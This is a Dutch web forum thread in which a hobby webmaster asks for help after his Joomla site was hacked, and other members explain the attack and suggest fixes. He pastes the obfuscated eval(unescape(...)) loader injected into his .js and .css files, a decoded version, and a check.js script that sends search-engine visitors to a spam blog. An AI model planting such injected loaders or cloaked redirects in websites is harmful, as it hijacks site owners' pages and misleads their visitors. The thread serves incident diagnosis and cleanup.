Check alle échte Black Friday-deals Ook zo moe van nepaanbiedingen? Wij laten alleen échte deals zien

[Gehacked] Site gehacked, lek nog niet boven, help!

Pagina: 1
Acties:

  • simmayor
  • Registratie: November 2001
  • Laatst online: 14-09-2023
Ik heb voor de hobby een aantal site. 2 sites zijn zelf gemaakt op basis van PHP en 2 andere zijn gemaakt met behulp van Joomla/Mambo.

Wat is er aan de hand?
Ik moest toevallig op mijn site zijn en kwam erachter dat er een een of ander BLOG wordt getoond.
Kijk zelf maar : www.cpu-info.com
Je krijgt het volgende te zien :

Afbeeldingslocatie: http://www.cpu-info.com/webpics/Tweakers/2de-1.jpg

Terwijl het dus dit moet zijn :

Afbeeldingslocatie: http://www.cpu-info.com/webpics/Tweakers/2de-3.jpg


Het volgende heb ik gevonden

In de HTML files is niets te vinden. In alle .js en .css files die ik gebruik wel , daar is het volgende toegevoegd : /* a0b4df006e02184c60dbf503e71c87ad */ ;eval(unescape('%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%
65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%
31%20%3D%20%35%34%3B%20%4A%53%53%32%20%3D%20%38%34%30%34%36%3B%20%4A%
53%53%33%20%3D%20%27%2F%68%6F%75%74%64%75%69%66%2F%6D%61%6D%62%6F%74%
73%2F%65%64%69%74%6F%72%73%2F%74%69%6E%79%6D%63%65%2F%6A%73%63%72%69%
70%74%73%2F%74%69%6E%79%5F%6D%63%65%2F%68%61%6C%75%70%61%76%2F%64%75%
6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63%75%
6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%
69%70%74%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%
27%73%72%63%27%2C%20%27%2F%68%6F%75%74%64%75%69%66%2F%6D%61%6D%62%6F%
74%73%2F%65%64%69%74%6F%72%73%2F%74%69%6E%79%6D%63%65%2F%6A%73%63%72%
69%70%74%73%2F%74%69%6E%79%5F%6D%63%65%2F%68%61%6C%75%70%61%76%2F%63%
68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%
75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%
6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%
6D%65%28%27%68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E%61%70%70%65%
6E%64%43%68%69%6C%64%28%6A%73%29%20%7D%3B%20')); /* 995d2cc661fa72452472e9554b5520c */

Door dit weg te halen krijg ik allemaal Server connection errors.
Ik heb nog een verwijzing gevonden via "last visited" van CPANEL naar een locatie in een Joomla site directory daar staan de volgende files :

Afbeeldingslocatie: http://www.cpu-info.com/webpics/Tweakers/2de-2.jpg

Die htm files bevatten dus de Blog site en de check.js file heeft de volgende inhoud :
if ( (Math.random()*60 < JSS1) && document.referrer.match(/^http:\/\/([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|
yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|
aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\./) && document.referrer.match(/[?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|
search_string|search_word|buscar|text|words|su|qt|rdata)\=/) && !document.referrer.match(/[?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|
search_string|search_word|buscar|text|words|su|qt|rdata)\=[^&]+(%3A|%22)/) ){ location.href=JSS3+'?r='+encodeURIComponent(document.referrer)+'&s='+JSS2; };

Kan iemand mij helpen om het lek boven te krijgen? Ik heb de sites voor mijn lol, k**** hacker! :(

Processor informatie -> www.cpu-info.com & www.coprocessor.info


  • BastiaanN
  • Registratie: September 2003
  • Niet online
Heb je geen virus op je machine?
Ik krijg gewoon netjes je website ervoor zoals je hem graag wilt hebben.

Strava | :-( + ┌(^0^)┘= :-)


  • DinX
  • Registratie: Februari 2002
  • Laatst online: 29-11 17:40

DinX

Motormuis

De site werkt hier gewoon zoals het hoort. Het lijkt me eerder iets lokaal op je eigen pc. Scan eens op virussen/spyware/malware/...

Marokko 2015: Route
Sat Tracker: SpotWalla
Blog: Gone for a ride


  • SKiLLa
  • Registratie: Februari 2002
  • Niet online

SKiLLa

Byte or nibble a bit ?

Dat JS "hijackt" je website alleen als er een special HTTP referrer is meegegeven. Open je de website link direct, dan krijg je de normale website, ga via een zoekmachine, dan krijg je de gehackte site.

PS: Zal wel een bekende (oude ?) lek in Joomla zijn ofzo ... Update'n, admin pwd veranderen en dan ff fora afstruinen op die HTML code, het zal ongetwijfeld een bekende "kit" zijn.

[ Voor 86% gewijzigd door SKiLLa op 02-02-2008 18:05 ]

'Political Correctness is fascism pretending to be good manners.' - George Carlin


  • oehoe
  • Registratie: Mei 2000
  • Laatst online: 25-11 13:03

oehoe

blije prutser, ouwe sok

met --^
Ik zou idd bovenstaande tips eens uitvoeren.

George Orwell considered some variations of 1984. All money should be marked so that anything could be traced back and men should be made to carry devices so that their position would be known. It seemed so unrealistic that he dropped these ideas..


  • Jaap-Jan
  • Registratie: Februari 2001
  • Laatst online: 19:03
Nee, zijn website is gehackt. Het is reproduceerbaar, zie zijn vorige topic: \[Gehacked?] iroffer en peakclick

@TS: Heb je geen backup van je website? Ga sowieso eens uitzoeken hoe hij binnen is gekomen. Gebruik je onveilige PHP- scripts, spit de log na van je webserver en kijk wat ze hebben gedaan. :)

[ Voor 42% gewijzigd door Jaap-Jan op 02-02-2008 18:05 ]

| Last.fm | "Mr Bent liked counting. You could trust numbers, except perhaps for pi, but he was working on that in his spare time and it was bound to give in sooner or later." -Terry Pratchett


  • DinX
  • Registratie: Februari 2002
  • Laatst online: 29-11 17:40

DinX

Motormuis

Hmm, inderdaad. Als je doorklikt vanaf google krijg je wat anders te zien. My bad.

Marokko 2015: Route
Sat Tracker: SpotWalla
Blog: Gone for a ride


  • gambieter
  • Registratie: Oktober 2006
  • Niet online

gambieter

Just me & my cat

Goede beveiliging begint thuis. Volgende keer eerst op andere PCs (vrienden kennissen, scholen) proberen voor je in paniek raakt? Blijkbaar heb je geen afdoende beveiliging op je eigen PC, haak deze los en ga met een live CD, Hijack This etc maar eens controleren. Zie ook de Beveiliging en Virussen - FAQ :) .
Edit: een referralprobleem dus. Dat bleek niet uit de startpost, het gaat alleen fout via Google.

[ Voor 13% gewijzigd door gambieter op 02-02-2008 18:07 ]

I had a decent lunch, and I'm feeling quite amiable. That's why you're still alive.


  • TRON
  • Registratie: September 2001
  • Laatst online: 27-11 12:50
Nee, de site is wel gehacked. Zoek de site eens op en bezoek deze via Google.


-edit-
Zet een back-up terug van je site en zorg dat Joomla gepatched is. Verwittig je hoster ook van het feit dat dit gebeurd is. Wellicht is er iets mis op de server.

[ Voor 53% gewijzigd door TRON op 02-02-2008 18:07 . Reden: Aanvullende info. ]

Leren door te strijden? Dat doe je op CTFSpel.nl. Vraag een gratis proefpakket aan t.w.v. EUR 50 (excl. BTW)


  • BastiaanN
  • Registratie: September 2003
  • Niet online
Klopt ik zie het, het gebeurt dus alleen als je via een zoekmachine wordt gerefereerd.

Welke versie van joomla gebruik je?
Kijk eens hier voor mogelijke security issues van joomla: http://secunia.com/search/?search=joomla

Strava | :-( + ┌(^0^)┘= :-)


  • wasted247
  • Registratie: Oktober 2006
  • Laatst online: 18-12-2024
@ hierboven, ga eens via google naar de site ;)

In het stukje java was je laat zien staan iig refferers aangegeven waardoor de bezoeker op de site moet komen. Veel meer kan ik je ook niet vertellen...

Allereerst maar eens de refferer string aanpassen in de check.js ;)

Edit: Voor zover ik kan zie haalt de js de zoek termen van de refferer er bij, en geeft deze zelf een zoekpagina weer. wanneer ik op cpu-info google, bij jou site kom en er vervolgens op klik, krijg ik (op jouw site) zoek resultaten voor cpu-info. Zoals ook te zien op jouw screenshot, alleen dan de zoekterm 'insurance'.

Je web server is dus gehackt en functioneerd nu als zoekmachine...

[ Voor 41% gewijzigd door wasted247 op 02-02-2008 18:11 ]


  • oehoe
  • Registratie: Mei 2000
  • Laatst online: 25-11 13:03

oehoe

blije prutser, ouwe sok

Jaap-Jan schreef op zaterdag 02 februari 2008 @ 18:02:
Nee, zijn website is gehackt. Het is reproduceerbaar, zie zijn vorige topic: \[Gehacked?] iroffer en peakclick

@TS: Heb je geen backup van je website? Ga sowieso eens uitzoeken hoe hij binnen is gekomen. Gebruik je onveilige PHP- scripts, spit de log na van je webserver en kijk wat ze hebben gedaan. :)
Dat snap ik ff niet, hoe kan het dan zijn dat als ik de url van zijn website intik, zíjn site zie en niet die andere (dus wat er door iemand anders is neergezet)?

George Orwell considered some variations of 1984. All money should be marked so that anything could be traced back and men should be made to carry devices so that their position would be known. It seemed so unrealistic that he dropped these ideas..


  • SKiLLa
  • Registratie: Februari 2002
  • Niet online

SKiLLa

Byte or nibble a bit ?

Het is gewoon een "ik-wil-meer-geld-verdienen-met-ad-clicks-%&**-script" dat zich als een blog, inc. comments vermomd ... Gewoon klagen bij de "ad-provider", dan wordt de betreffende referer-account vast gesloten, ... maar uiteraard eerst je "lek" dichten.

'Political Correctness is fascism pretending to be good manners.' - George Carlin


  • DinX
  • Registratie: Februari 2002
  • Laatst online: 29-11 17:40

DinX

Motormuis

oehoe schreef op zaterdag 02 februari 2008 @ 18:07:
[...]


Dat snap ik ff niet, hoe kan het dan zijn dat als ik de url van zijn website intik, zíjn site zie en niet die andere (dus wat er door iemand anders is neergezet)?
PHP:
1
2
3
<?
echo $_SERVER['HTTP_REFERER'];
?>


:p

[ Voor 10% gewijzigd door DinX op 02-02-2008 18:10 ]

Marokko 2015: Route
Sat Tracker: SpotWalla
Blog: Gone for a ride


  • oehoe
  • Registratie: Mei 2000
  • Laatst online: 25-11 13:03

oehoe

blije prutser, ouwe sok

Maw: rechtstreeks = ok, via referrer = niet goed?

George Orwell considered some variations of 1984. All money should be marked so that anything could be traced back and men should be made to carry devices so that their position would be known. It seemed so unrealistic that he dropped these ideas..


  • TRON
  • Registratie: September 2001
  • Laatst online: 27-11 12:50
En dit staat er in het script:
if (!document.getElementById('JSSS')){ JSS1 = 54; JSS2 = 84046; JSS3 = '/houtduif/mambots/editors/tinymce/jscripts/tiny_mce/halupav/dummy.htm'; var js = document.createElement('script'); js.setAttribute('src', '/houtduif/mambots/editors/tinymce/jscripts/tiny_mce/halupav/check.js'); js.setAttribute('id', 'JSSS'); document.getElementsByTagName('head').item(0).appendChild(js) };

Leren door te strijden? Dat doe je op CTFSpel.nl. Vraag een gratis proefpakket aan t.w.v. EUR 50 (excl. BTW)


  • DinX
  • Registratie: Februari 2002
  • Laatst online: 29-11 17:40

DinX

Motormuis

oehoe schreef op zaterdag 02 februari 2008 @ 18:10:
[...]

Maw: rechtstreeks = ok, via referrer = niet goed?
Klopt, je kan gewoon zien vanwaar mensen komen als ze op je site komen. Veelvuldig gebruikt voor bijvoorbeeld hotlink beveiliging. In dit geval wordt het misbruikt om enkel in dat geval (referring sites) een andere site te laten zien. Als eigenaar ga je meestal niet via google je website bezoeken neem ik aan, dus is de kans groter dat die hack niet gespot wordt door de eigenaar.

Moet toegeven, het is slim gevonden :p

[ Voor 3% gewijzigd door DinX op 02-02-2008 18:13 ]

Marokko 2015: Route
Sat Tracker: SpotWalla
Blog: Gone for a ride


  • wasted247
  • Registratie: Oktober 2006
  • Laatst online: 18-12-2024
oehoe schreef op zaterdag 02 februari 2008 @ 18:10:
[...]

Maw: rechtstreeks = ok, via referrer = niet goed?
Si...

  • oehoe
  • Registratie: Mei 2000
  • Laatst online: 25-11 13:03

oehoe

blije prutser, ouwe sok

DinX schreef op zaterdag 02 februari 2008 @ 18:12:
[...]


Klopt, je kan gewoon zien vanwaar mensen komen als ze op je site komen. Veelvuldig gebruikt voor bijvoorbeeld hotlink beveiliging. In dit geval wordt het misbruikt om enkel in dat geval (referring sites) een andere site te laten zien. Als eigenaar ga je meestal niet via google je website bezoeken neem ik aan, dus is de kans groter dat die hack niet gespot wordt door de eigenaar.

Moet toegeven, het is slim gevonden :p
Dank voor de uitleg - weer wat geleerd vandaag.
en mijn PHP skills zijn < 0...

[ Voor 3% gewijzigd door oehoe op 02-02-2008 18:16 ]

George Orwell considered some variations of 1984. All money should be marked so that anything could be traced back and men should be made to carry devices so that their position would be known. It seemed so unrealistic that he dropped these ideas..


  • TRON
  • Registratie: September 2001
  • Laatst online: 27-11 12:50
Het zit goed in elkaar. Je moet inderdaad vanuit een bepaalde pagina de site bezoeken. Dit zorgt er inderdaad voor dat bezoekers die er vaak komen dit niet zal opvallen :)

Leren door te strijden? Dat doe je op CTFSpel.nl. Vraag een gratis proefpakket aan t.w.v. EUR 50 (excl. BTW)


  • BastiaanN
  • Registratie: September 2003
  • Niet online
http://secunia.com/advisories/28670/

dit komt erg overeen met de directory waarin jij de files vond. Misschien een kwestie van joomla updaten zodat het lek gedicht wordt

Strava | :-( + ┌(^0^)┘= :-)


  • simmayor
  • Registratie: November 2001
  • Laatst online: 14-09-2023
Geweldig bedankt voor alle tips en suggesties. Ik ga er meteen mee aan de slag! _/-\o_

Ik laat jullie weten wat de resultaten zijn.

Processor informatie -> www.cpu-info.com & www.coprocessor.info


  • simmayor
  • Registratie: November 2001
  • Laatst online: 14-09-2023
Poeh, alle .js, .css en de htaccess waren geinfecteerd. Er stonden tevens nog wat losse .PHP files die ik niet kende en daar zat de code ook in. |:(

Ik zal de hele site moeten nalopen om er zeker van te zijn dat er niet nog ergens iets staat.

De Joomla installaties hebben een beperkte toegang gekregen. Hopelijk kan de hacker de boel niet meer aanpassen. Ik zal het even moeten afwachten.

Wat wel heel raar trouwens dat de date modified van de aangepaste files nergens is veranderd naar de daadwerkelijke datum. Ze staan allen nog op ergens vorig jaar of langer geleden.

Bedankt voor alle hulp! _/-\o_

Processor informatie -> www.cpu-info.com & www.coprocessor.info


  • TRON
  • Registratie: September 2001
  • Laatst online: 27-11 12:50
simmayor schreef op zaterdag 02 februari 2008 @ 21:16:

Wat wel heel raar trouwens dat de date modified van de aangepaste files nergens is veranderd naar de daadwerkelijke datum. Ze staan allen nog op ergens vorig jaar of langer geleden.

Bedankt voor alle hulp! _/-\o_
Dat hoeft inderdaad niet te veranderen. Als men bestanden upload met een oude 'wijzigingsdatum' dan zie je inderdaad niet dat het nieuwe bestanden zijn.

Leren door te strijden? Dat doe je op CTFSpel.nl. Vraag een gratis proefpakket aan t.w.v. EUR 50 (excl. BTW)

Pagina: 1